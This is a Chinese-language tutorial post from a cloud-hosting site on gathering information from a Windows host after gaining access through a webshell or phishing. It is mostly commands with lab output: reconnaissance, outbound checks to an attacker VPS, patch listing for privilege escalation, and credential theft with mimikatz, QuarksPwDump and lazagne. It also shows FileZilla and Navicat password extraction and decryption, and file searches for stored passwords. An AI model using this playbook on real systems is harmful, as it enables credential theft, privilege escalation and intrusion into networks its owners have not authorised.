溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章主要介紹“如何使用單機信息收集”,在日常操作中,相信很多人在如何使用單機信息收集問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”如何使用單機信息收集”的疑惑有所幫助!接下來,請跟著小編一起來學習吧!
當我們獲得一個webshell、或者通過釣魚等等獲得初始訪問權后,在進一步滲透之前,我們有必要先收集一下當前機的信息,不單單是當前機的配置信息。
下面主要思考以下幾個問題:
收集那些信息?
怎么收集這些信息?
為什么收集這些信息(有啥用,在哪用)?
本機配置信息-網絡配置、是否域、系統配置、出網、端口連接信息、服務、進程、已安裝軟件、host文件、環境變量
賬號密碼 -本機賬號密碼、域內其他賬號、數據庫密碼、SSH密碼、遠程登陸密碼、WIFI密碼、服務配置文件密碼、備份文件密碼等等
其他信息- 瀏覽器歷史+書簽、常用位置等等
1. 網絡配置
[ ip、網關、掩碼、dns后綴] :主要用來配置一些網絡信息,方便通道構建、了解當前網段大小
ipconfig /all
PS C:\Users\Administrator> ipconfig /all Windows IP 配置 主機名 . . . . . . . . . . . . . : WIN-DC 主 DNS 后綴 . . . . . . . . . . . : langke.org 節點類型 . . . . . . . . . . . . : 混合 IP 路由已啟用 . . . . . . . . . . : 否 WINS 代理已啟用 . . . . . . . . . : 否 DNS 后綴搜索列表 . . . . . . . . : langke.org 以太網適配器 Ethernet0: 連接特定的 DNS 后綴 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆網絡連接 物理地址. . . . . . . . . . . . . : 00-0C-29-95-22-43 DHCP 已啟用 . . . . . . . . . . . : 否 自動配置已啟用. . . . . . . . . . : 是 本地鏈接 IPv6 地址. . . . . . . . : fe80::ed4c:c67:a2b6:7a38%12(首選) IPv4 地址 . . . . . . . . . . . . : 192.168.4.3(首選) 子網掩碼 . . . . . . . . . . . . : 255.255.255.0 默認網關. . . . . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 301993001 DHCPv6 客戶端 DUID . . . . . . . : 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43 DNS 服務器 . . . . . . . . . . . : ::1 TCPIP 上的 NetBIOS . . . . . . . : 已啟用 隧道適配器 isatap.{9A2D7433-2455-4F1A-9314-BBC3C6939A99}: 媒體狀態 . . . . . . . . . . . . : 媒體已斷開 連接特定的 DNS 后綴 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已啟用 . . . . . . . . . . . : 否 自動配置已啟用. . . . . . . . . . : 是
[DNS緩存]
ipconfig /displaydns
PS C:\Users\Administrator> ipconfig /displaydns Windows IP 配置 _ldap._tcp.win-dc.langke.org ---------------------------------------- 名稱不存在。 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org ---------------------------------------- 記錄名稱. . . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org 記錄類型. . . . . . . : 5 生存時間. . . . . . . : 144 數據長度. . . . . . . : 8 部分. . . . . . . . . : 答案 CNAME 記錄 . . . . . : win-dc.langke.org isatap ---------------------------------------- 名稱不存在。 wpad ---------------------------------------- 名稱不存在。 _ldap._tcp.default-first-site-name._sites.win-dc.langke.org ---------------------------------------- 名稱不存在。
[路由表]
route print
PS C:\Users\Administrator> route print =========================================================================== 接口列表 12...00 0c 29 95 22 43 ......Intel(R) 82574L 千兆網絡連接 1...........................Software Loopback Interface 1 13...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2 =========================================================================== IPv4 路由表 =========================================================================== 活動路由: 網絡目標 網絡掩碼 網關 接口 躍點數 127.0.0.0 255.0.0.0 在鏈路上 127.0.0.1 306 127.0.0.1 255.255.255.255 在鏈路上 127.0.0.1 306 127.255.255.255 255.255.255.255 在鏈路上 127.0.0.1 306 192.168.4.0 255.255.255.0 在鏈路上 192.168.4.3 266 192.168.4.3 255.255.255.255 在鏈路上 192.168.4.3 266 192.168.4.255 255.255.255.255 在鏈路上 192.168.4.3 266 224.0.0.0 240.0.0.0 在鏈路上 127.0.0.1 306 224.0.0.0 240.0.0.0 在鏈路上 192.168.4.3 266 255.255.255.255 255.255.255.255 在鏈路上 127.0.0.1 306 255.255.255.255 255.255.255.255 在鏈路上 192.168.4.3 266 =========================================================================== 永久路由: 無 IPv6 路由表 =========================================================================== 活動路由: 接口躍點數網絡目標 網關 1 306 ::1/128 在鏈路上 12 266 fe80::/64 在鏈路上 12 266 fe80::ed4c:c67:a2b6:7a38/128 在鏈路上 1 306 ff00::/8 在鏈路上 12 266 ff00::/8 在鏈路上 =========================================================================== 永久路由: 無
[arp表] :獲取arp緩存記錄,發現內網中更多的存活主機。
arp -a
PS C:\Users\Administrator> arp -a 接口: 192.168.4.3 --- 0xc Internet 地址 物理地址 類型 192.168.4.100 00-0c-29-11-83-25 動態 192.168.4.101 00-0c-29-dd-e4-ef 動態 192.168.4.255 ff-ff-ff-ff-ff-ff 靜態 224.0.0.22 01-00-5e-00-00-16 靜態 224.0.0.252 01-00-5e-00-00-fc 靜態
2. 是否域
[主機名、域信息]:看當前主機是否在域內,如果在域內,進一步收集當前域信息。
net config workstation
PS C:\Users\Administrator> net config workstation
計算機名 \\WIN-DC
計算機全名 WIN-DC.langke.org
用戶名 Administrator
工作站正運行于
NetBT_Tcpip_{9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243)
軟件版本 Windows Server 2012 R2 Standard
工作站域 LANGKE
工作站域 DNS 名稱 langke.org
登錄域 LANGKE
COM 打開超時 (秒) 0
COM 發送計數 (字節) 16
COM 發送超時 (毫秒) 250
命令成功完成。3. 系統配置
[系統名稱、版本、位數、啟動時間、是否虛擬機及虛擬機類型]:了解系統的基本信息,主要是方便工具的選擇,還有不同版本Windows的變更。比如:2012版后默認無法讀取明文密碼,只能讀取密碼hash或更改注冊表并重啟才能讀取密碼。
systeminfo
PS C:\Users\Administrator> systeminfo 主機名: WIN-DC OS 名稱: Microsoft Windows Server 2012 R2 Standard OS 版本: 6.3.9600 暫缺 Build 9600 OS 制造商: Microsoft Corporation OS 配置: 主域控制器 OS 構件類型: Multiprocessor Free 注冊的所有人: Windows 用戶 注冊的組織: 產品 ID: 00252-70000-00000-AA581 初始安裝日期: 2019/10/21, 23:12:01 系統啟動時間: 2020/12/4, 23:36:58 系統制造商: VMware, Inc. 系統型號: VMware Virtual Platform 系統類型: x64-based PC 處理器: 安裝了 2 個處理器。 [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~ [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~ BIOS 版本: Phoenix Technologies LTD 6.00, 2018/4/13 Windows 目錄: C:\Windows 系統目錄: C:\Windows\system32 啟動設備: \Device\HarddiskVolume1 系統區域設置: zh-cn;中文(中國) 輸入法區域設置: zh-cn;中文(中國) 時區: (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊 物理內存總量: 2,047 MB 可用的物理內存: 846 MB 虛擬內存: 最大值: 6,655 MB 虛擬內存: 可用: 5,255 MB 虛擬內存: 使用中: 1,400 MB 頁面文件位置: C:\pagefile.sys 域: langke.org 登錄服務器: \\WIN-DC 修補程序: 安裝了 110 個修補程序。 [01]: KB2894852 [02]: KB2894856 [03]: KB2919355 · · · 網卡: 安裝了 1 個 NIC。 [01]: Intel(R) 82574L 千兆網絡連接 連接名: Ethernet0 啟用 DHCP: 否 IP 地址 [01]: 192.168.4.3 [02]: fe80::ed4c:c67:a2b6:7a38 Hyper-V 要求: 已檢測到虛擬機監控程序。將不顯示 Hyper-V 所需的功能。
4. 是否出網
[TCP、ICMP、UDP、DNS]:了解主機是否可以連接外網、主要為了配合代理搭建、數據導出等等
telnet vps_ip 80
ping vps_ip
nc -u vps_ip 53
nslookup www.baidu.com
5. 端口連接信息
[開放端口、連接信息]:主要用來收集端口開放情況,方便進一步滲透,比如: 3389端口,可以直接去連接桌面,1433端口,可以去進一步收集信息。
netstat -ano
C:\Users\lisi>netstat -ano 活動連接 協議 本地地址 外部地址 狀態 PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 728 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:554 0.0.0.0:0 LISTENING 2992 TCP 0.0.0.0:2869 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:10243 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 400 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 780 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 948 TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING 504 TCP 0.0.0.0:64849 0.0.0.0:0 LISTENING 512 TCP 192.168.4.101:139 0.0.0.0:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 728 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:554 [::]:0 LISTENING 2992 TCP [::]:2869 [::]:0 LISTENING 4 TCP [::]:5357 [::]:0 LISTENING 4 TCP [::]:10243 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 400 TCP [::]:49153 [::]:0 LISTENING 780 TCP [::]:49154 [::]:0 LISTENING 948 TCP [::]:49159 [::]:0 LISTENING 504 TCP [::]:64849 [::]:0 LISTENING 512 UDP 0.0.0.0:123 *:* 596 UDP 0.0.0.0:3702 *:* 1456 UDP 0.0.0.0:3702 *:* 1456 UDP 0.0.0.0:5004 *:* 2992 UDP 0.0.0.0:5005 *:* 2992 UDP 0.0.0.0:5355 *:* 1052 UDP 0.0.0.0:55527 *:* 1456 UDP 127.0.0.1:1900 *:* 1456 UDP 127.0.0.1:55529 *:* 512 UDP 127.0.0.1:55531 *:* 1052 UDP 127.0.0.1:58374 *:* 948 UDP 127.0.0.1:60697 *:* 1456 UDP 192.168.4.101:137 *:* 4 UDP 192.168.4.101:138 *:* 4 UDP 192.168.4.101:1900 *:* 1456 UDP 192.168.4.101:60696 *:* 1456 UDP [::]:123 *:* 596 UDP [::]:3702 *:* 1456 UDP [::]:3702 *:* 1456 UDP [::]:5004 *:* 2992 UDP [::]:5005 *:* 2992 UDP [::]:5355 *:* 1052 UDP [::]:55528 *:* 1456 UDP [::1]:1900 *:* 1456 UDP [::1]:60695 *:* 1456 UDP [fe80::d4b6:7c0:d036:7e77%11]:1900 *:* 1456 UDP [fe80::d4b6:7c0:d036:7e77%11]:60694 *:* 1456
6. 補丁
[補丁網址、ID、日期]:收集系統安裝的補丁信息,一般提權時查找對應exp
wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\Users\Administrator>wmic qfe get Caption,Description,HotFixID,InstalledOn Caption Description HotFixID InstalledOn http://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 1/27/2020 http://support.microsoft.com/?kbid=2621440 Security Update KB2621440 12/4/2020 http://support.microsoft.com/?kbid=2653956 Security Update KB2653956 12/4/2020 http://support.microsoft.com/?kbid=2943357 Security Update KB2943357 6/24/2020 http://support.microsoft.com/?kbid=2999226 Update KB2999226 1/27/2020 http://support.microsoft.com/?kbid=3097989 Security Update KB3097989 6/24/2020 http://support.microsoft.com/?kbid=4019990 Update KB4019990 12/4/2020 http://support.microsoft.com/?kbid=4040980 Update KB4040980 12/4/2020 http://support.microsoft.com Update KB958488 2/9/2020 http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010
7. 服務
[服務名、模式、路徑名]:收集當前系統正在運行的服務,主要看看有沒有殺軟、監控軟件、web服務、數據庫服務。
wmic service where (state="running") get caption, name, startmode,pathname
C:\Users\Administrator>wmic service where (state="running") get caption, name, startmode,pathname
Caption Name PathName
StartMode
Active Directory Web Services ADWS C:\Windows\ADWS\Microsoft.ActiveDirector
y.WebServices.exe Auto
Base Filtering Engine BFE C:\Windows\system32\svchost.exe -k Local
ServiceNoNetwork Auto
Background Intelligent Transfer Service BITS C:\Windows\System32\svchost.exe -k netsv
cs Auto
Background Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomL
aunch Auto
Computer Browser Browser C:\Windows\System32\svchost.exe -k netsv
cs Auto
COM+ System Application COMSysApp C:\Windows\system32\dllhost.exe /Process
id:{02D4B3F1-FD88-11D1-960D-00805FC79235} Manual
Cryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k Netwo
rkService Auto
DCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomL
aunch Auto
DFS Namespace Dfs C:\Windows\system32\dfssvc.exe
Auto
DFS Replication DFSR C:\Windows\system32\DFSRs.exe
Auto
DHCP Client Dhcp C:\Windows\system32\svchost.exe -k Local
ServiceNetworkRestricted Auto
DHCP Server DHCPServer C:\Windows\system32\svchost.exe -k DHCPS
erver Auto
Diagnostics Tracking Service DiagTrack C:\Windows\System32\svchost.exe -k utcsv
······8. 進程
[進程名、pid、對應服務]:收集系統當前運行的進程,關注是否有殺軟、監控軟件、遠程管理工具等
tasklist /svc
C:\Users\Administrator>tasklist /svc 映像名稱 PID 服務 ========================= ======== ============================================ lsass.exe 504 Kdc, Netlogon, NTDS, SamSs svchost.exe 636 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBroker svchost.exe 680 RpcEptMapper, RpcSs dwm.exe 776 暫缺 vmacthlp.exe 796 VMware Physical Disk Helper Service svchost.exe 860 Dhcp, EventLog, lmhosts, Wcmsvc svchost.exe 892 BITS, Browser, DsmSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Themes, Winmgmt svchost.exe 940 EventSystem, FontCache, netprofm, nsi, W32Time svchost.exe 1012 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 736 BFE, DPS, MpsSvc spoolsv.exe 1340 Spooler Microsoft.ActiveDirectory 1372 ADWS dfsrs.exe 1412 DFSR svchost.exe 1452 DHCPServer svchost.exe 1472 DiagTrack dns.exe 1488 DNS ismserv.exe 1508 IsmServ MsDtsSrvr.exe 1724 MsDtsServer110 SMSvcHost.exe 1880 NetTcpPortSharing sqlbrowser.exe 1932 SQLBrowser sqlwriter.exe 2000 SQLWriter ServerManager.exe 3536 暫缺 vmtoolsd.exe 1984 暫缺 mmc.exe 1872 暫缺 powershell.exe 1428 暫缺 conhost.exe 1776 暫缺 cmd.exe 1076 暫缺 tasklist.exe 3948 暫缺
9. 已安裝軟件
[軟件、版本]:此命令收集的已安裝軟件可能不全,不過可以大概了解已安裝的軟件信息。可以用來提權和留后門。比如之前的某狗輸入法依賴等。
wmic product get name,version
C:\Users\Administrator>wmic product get name,version Name Version Microsoft Application Error Reporting 12.0.6012.5000 Microsoft SQL Server System CLR Types 10.51.2500.0 SQL Server 2012 Client Tools 11.0.2100.60 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 9.0.30729.4974 SQL Server 2012 Documentation Components 11.0.2100.60 Microsoft SQL Server 2012 數據層應用程序框架 11.0.2100.60 SQL Server 2012 Master Data Services 11.0.2100.60 Microsoft SQL Server 2012 Native Client 11.0.2100.60 SQL Server 2012 Database Engine Services 11.0.2100.60 Microsoft System CLR Types for SQL Server 2012 11.0.2100.60 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219 SQL Server 2012 Distributed Replay 11.0.2100.60 Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810 14.12.25810 Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219 Microsoft SQL Server 2012 管理對象 11.0.2100.60 VMware Tools 10.3.2.9925305 SQL Server 2012 Integration Services 11.0.2100.60 Microsoft VSS Writer for SQL Server 2012 11.0.2100.60 Visual Studio 2010 Prerequisites - English 10.0.40219 SQL Server 2012 Distributed Replay 11.0.2100.60
10. hosts
[host文件]:系統的host配置,可能會收集到一些隱藏資產
C:\Windows\System32\drivers\etc\hosts
C:\Users\Administrator>type C:\Windows\System32\drivers\etc\hosts # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost
11. 環境變量
[環境變量]:收集系統的環境變量,主要看有哪些可使用的腳本、程序等
path
C:\Users\Administrator>path PATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program File s\Microsoft SQL Server\110\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\ManagementStudio\;C:\Pro gram Files (x86)\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program F iles (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\;C:\Program Files (x86)\Microsoft SQL Server\110\D TS\Binn\
12. 防火墻配置規則
[防火墻規則]:收集系統的防火墻配置規則,查看出入網配置情況。
netsh firewall show config
C:\Users\Administrator>netsh firewall show config 域 配置文件配置: ------------------------------------------------------------------- 操作模式 = 禁用 例外模式 = 啟用 多播/廣播響應模式 = 啟用 通知模式 = 禁用 域 配置文件的服務配置文件: 模式 自定義 名稱 ------------------------------------------------------------------- 啟用 否 文件和打印機共享 域 配置文件的允許的程序配置: 模式 流量方向 名稱/程序 ------------------------------------------------------------------- 域 配置文件的端口配置: 端口 協議 流量方向 名稱 ------------------------------------------------------------------- 1688 TCP 啟用 入站 HEU_KMS_Service ······ ?
1. 本機賬號密碼
本機用戶
net user
C:\Users\Administrator>net user \\WIN-DC 的用戶帳戶 ------------------------------------------------------------------------------- Administrator Guest john krbtgt lisi 命令成功完成。
在線用戶
query user
C:\Users\Administrator>query user 用戶名 會話名 ID 狀態 空閑時間 登錄時間 >administrator console 1 運行中 無 2020/12/4 23:38
密碼
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
c:\Users\lisi\Desktop>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit .#####. mimikatz 2.2.0 (x64) #17763 Mar 25 2019 01:42:05 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # log Using 'mimikatz.log' for logfile : OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 1931626 (00000000:001d796a) Session : Interactive from 2 User Name : administrator Domain : LANGKE Logon Server : WIN-DC Logon Time : 2020/12/5 0:20:14 SID : S-1-5-21-2022301354-2747916058-908538118-500 msv : [00000003] Primary * Username : Administrator * Domain : LANGKE * LM : 629ea9eacefe7125c187b8085fe1d9df * NTLM : 2723e394bfa34a878b638852b4e37335 * SHA1 : 87af129263c193d09d6cade355c50a2d415cabe7 tspkg : * Username : Administrator * Domain : LANGKE * Password : 2wsx@WSX wdigest : * Username : Administrator * Domain : LANGKE * Password : 2wsx@WSX kerberos : * Username : administrator * Domain : LANGKE.ORG * Password : 2wsx@WSX ssp : credman : Authentication Id : 0 ; 630324 (00000000:00099e34) Session : Interactive from 2 User Name : lisi Domain : LANGKE Logon Server : WIN-DC Logon Time : 2020/12/4 23:45:44 SID : S-1-5-21-2022301354-2747916058-908538118-1116
hash
QuarksPwDump.exe
// 本機hash C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhl [+] Setting BACKUP and RESTORE privileges...[OK] [+] Parsing SAM registry hive...[OK] [+] BOOTKEY retrieving...[OK] BOOTKEY = D61E03DA80125215915636F578505991 --------------------------------------------- BEGIN DUMP -------------------------------------------- Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0::: Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE::: ---------------------------------------------- END DUMP --------------------------------------------- 2 dumped accounts // 域hash C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhdc [+] SYSKEY restrieving...[OK] SYSKEY = 20242EE7E4AABBF78F48427B90233C50 [+] Setting BACKUP and RESTORE privileges...[OK] [+] Parsing SECURITY registry hive...[OK] [+] LSAKEY(s) retrieving...[OK] LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1 [+] NLKM retrieving...[OK] NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440D F911AF41239E7DA82A313 No cached domain password found!
2. 域內其他賬號
域用戶
net user /domain
C:\Users\Administrator\Desktop>net user /domain \\WIN-DC 的用戶帳戶 ------------------------------------------------------------------------------- Administrator Guest john krbtgt lisi 命令成功完成。
當前域在線機器
net view
C:\Users\Administrator\Desktop>net view 服務器名稱 注解 ------------------------------------------------------------------------------- \\WIN-DC \\WIN-OA41MD9F1FJ 命令成功完成。
當前域中的域管
net group "domain admins" /domain
C:\Users\Administrator\Desktop>net group "domain admins" /domain 組名 Domain Admins 注釋 指定的域管理員 成員 ------------------------------------------------------------------------------- Administrator 命令成功完成。
3. 數據庫中的密碼
[Mysql]
select name,password from mysql.user
[MSSQL]
SELECT name, password_hash FROM master.sys.sql_logins;
4. 瀏覽器保存密碼、遠程登陸密碼、Windows系統保存的憑證、WIFI密碼等
lazagne.exe
5. FileZilla中保存的信息
[主機、端口、賬號、密碼]
type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"
C:\Users\Administrator>type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User" <Setting name="Config Location" platform="win">C:\Users\john\App Data\Roaming\FileZilla\</Setting> <Host /> <Port>21</Port> <LocalPath>C:\Users\john\</LocalPath> <Host>127.0.0.1</Host> <Port>21</Port> <User>admin</User> <Pass encoding="base64">MTIzNDU2Nzg=</Pass>
6. 管理工具中保存的信息
Navicat
[Mysql、MSSQL、Oracle、SQLite、MariaDB、PostgreSQL]:主機、端口、賬號都是明文,密碼為自定義加密,網上有解密腳本。
MySQL:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
Microsoft SQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\
// 查看保存有那些數據庫的賬號密碼 C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /f Navicat HKEY_CURRENT_USER\Software\PremiumSoft\Navicat HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite 搜索結束: 找到 8 匹配。 // 查看用戶名 C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f UserName /e HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122 UserName REG_SZ root HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123 UserName REG_SZ root // 查看密碼hash reg query HKCU\Software\PremiumSoft /s /f Pwd /e C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f Pwd /e HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122 Pwd REG_SZ HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123 Pwd REG_SZ 5658213BB7E6B3
https://github.com/HyperSine/how-does-navicat-encrypt-password
C:\Users\Administrator>navicat-encrypt-password\python3>python3 NavicatCryptoHelper.py -d 5658213BB7E6B3 root!@#
TeamViewer、Xshell、VNC、Winscp、FoXMail等等
5. 文件中保存的賬號密碼
[文件名]:
dir /s /b "*密碼*" "*登錄*" "*資產*" "*VPN*" "*Svn*" "*Git*" "*交接*" "*離職*" "*網絡*" "*后臺*" "*拓撲*" "*郵箱*" "*工資*" "*管理員*" "*巡檢*" "*備份*"
[文件內容]:從后綴為*.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi的文件中搜索包含"user=" "pass=" "login=" "uid=" "pwd="等關鍵字的行
findstr /I /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd=" /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi
1. 瀏覽器歷史+書簽
[Chrome 書簽]:json格式
C:\Users\當前用戶名\AppData\Local\Google\Chrome\User Data\Guest Profile\Bookmarks
[Chrome 歷史記錄]:SQLite格式,無密碼。
C:\Users\當前用戶名\AppData\Local\Google\Chrome\User Data\Default\History
Firefox、IE、Safar等等
工具:http://www.nirsoft.net
2. 常用位置文件列表
[桌面、下載]:大概率會有驚喜
dir c:%HOMEPATH%\Desktop
dir c:%HOMEPATH%\Download
到此,關于“如何使用單機信息收集”的學習就結束了,希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習,快去試試吧!若想繼續學習更多相關知識,請繼續關注億速云網站,小編會繼續努力為大家帶來更多實用的文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
